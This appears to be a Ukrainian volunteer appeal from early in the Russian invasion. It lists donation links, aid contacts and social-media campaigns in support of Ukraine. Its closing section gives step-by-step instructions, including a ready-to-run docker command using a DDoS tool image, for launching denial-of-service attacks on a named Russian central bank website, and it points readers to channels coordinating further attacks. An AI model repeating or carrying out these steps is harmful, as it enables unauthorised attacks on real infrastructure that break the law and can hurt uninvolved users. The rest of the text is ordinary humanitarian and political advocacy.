Information about support options
We all have witnessed a full-scale war in Europe. Jointly Russia and Belarus began a massive attack from east, north, and south on Ukraine. Our enemies use missiles, aircraft, warships, tanks, and other armored vehicles. They attack both military infrastructure and cities. But our Ukrainian army is brave and defends us effectively.
War is also about a humanitarian crisis. But we are a well-organized nation, with a huge experience in volunteering since the Revolution of Dignity. In Lviv and the whole region, we organized volunteers and coordinate their work effectively.
Right now we need your cooperation beyond our normal work. But, please, keep calm, we will return to our joint tasks, projects, and business soon. Thank you for the sanctions on Russia and Belarus, thank you for all the support you provide to us. But it didn’t stop our enemy yet. So, the Ukrainian army and Ukrainian people need more support from you to keep our common Europe safe.
There are different options for how you could support (for example, financial, material, informational, and joint cyber-attacks).
Financial support. You could support the Ukrainian Armed Forces, support NGO that purchases military safety equipment (not weapons) “Come Back Alive” and support NGO that purchases medicines and medical equipment – NGO Госпітальєри ( Госпитальеры/Hospitallers)
- Support Ukrainian Armed Forces – full details and proof (via Ukrainian National Bank, options for all major currencies included): https://lnkd.in/dRDj3dAR
- Support NGO that purchases military safety equipment (not weapons) – NGO “Come Back Alive”: https://savelife.in.ua/en/donate/
- Support NGO that purchases medicines and medical equipment – NGO Госпітальєри ( Госпитальеры/Hospitallers). Accounts:
Material support. You could provide goods and services for delivering goods within Europe to the Polish-Ukrainian border. In Wroclaw (Poland) Ukrainian diaspora is collecting goods (medicine, medical equipment, clothes, etc) needed to prevent the humanitarian crisis in Ukraine and send it to Ukraine. If you want to support them, please contact by email email@example.com and ask what is needed. Or you may contact the Lviv volunteer center (Maryan Pusak +380932483442 (Telegram, Viber, Whatsapp).
Informational/moral support. This is very important too.
From your social media accounts, you could support the campaign where we ask leaders in the West to support us more:
Ban Russia from SWIFT! Protect Ukrainian Sky! Send NATO to Ukraine! #BanRussiafromSwift #CloseTheSky #SendNatoToUkraine
You could also write some nice and motivating comments on the social media accounts of our Armed Forces. They are fighting for Ukraine in the first place, but they are fighting for safe Europe too. Please, say some words of gratitude. It will motivate them.
Commander-in-Chief of the Armed Forces of Ukraine https://www.facebook.com/CinCAFU
Also, please write some nice and motivating comments on social media accounts of Ukrainian public institutions and, city administrations. You may know Vitaliy Klitschko as a famous boxer, but now he is fighting against Russia and Belarus as a city mayor of Kyiv together with his brother and all people in Ukraine.
Twitter account of Volodymyr Zelenskyi (President of Ukraine): @ZelenskyyUa
Below there are accounts of some municipal institutions on Facebook:
- Kyiv city council: https://www.facebook.com/kyiv.city.council/ and a Facebook account of Vitaliy Klychko: https://www.facebook.com/Vitaliy.Klychko
- Kharkiv city council https://www.facebook.com/kharkovgovernment and a Facebook account of Ihor Terekhov (Kharkiv city mayor):https://www.facebook.com/ihor.terekhov
- Dnipro city council https://www.facebook.com/dneprorada and a Facebook account of Borys Filatov (Dnipro city mayor): https://www.facebook.com/filatovborys
- Odesa city council https://www.facebook.com/omr.gov.ua and a Facebook account of Hennadiy Truhanov (Odesa city mayor): https://www.facebook.com/gennadiytruhanov
- Lviv city council https://www.facebook.com/lviv.adm and a Facebook account of Andriy Sadovyi (Lviv city mayor): https://www.facebook.com/andriy.sadovyi
And one more city mayor needs your moral support now. Mayor of Okhtyrka (a town in the Sumy region in Ukraine). He is both a mayor and a surgeon. And right now he is saving the lives of children who were at kindergarten when Russian artillery bombed them. Facebook account of Pavlo Kuzmenko (Okhtyrka city mayor) https://www.facebook.com/Pawel.Kuzmenko.Okhtyrka
If you want to support us in providing DDOS attacks on their critical information portals. The instruction below:
- Install Docker and allocate the maximum number of cores in the resources CPU and RAM as much as possible
- Install ProtonVPN https://protonvpn.com/ (registration and login)
- Open ProtonVPN from any location
- Open terminal
- Run a command: docker run –rm -it nitupkcuf/ddos-ripper:latest cbr.ru
More information about this kind of support can be found on the telegram channel https://t.me/qaclublviv_chanel
You may write in English and they will respond to you. Most IT specialists from Lviv speak English.
Another option about how to support hackers in cyberwar: https://dou.ua/forums/topic/36700/
Stay strong! Stay with Ukraine!🇺🇦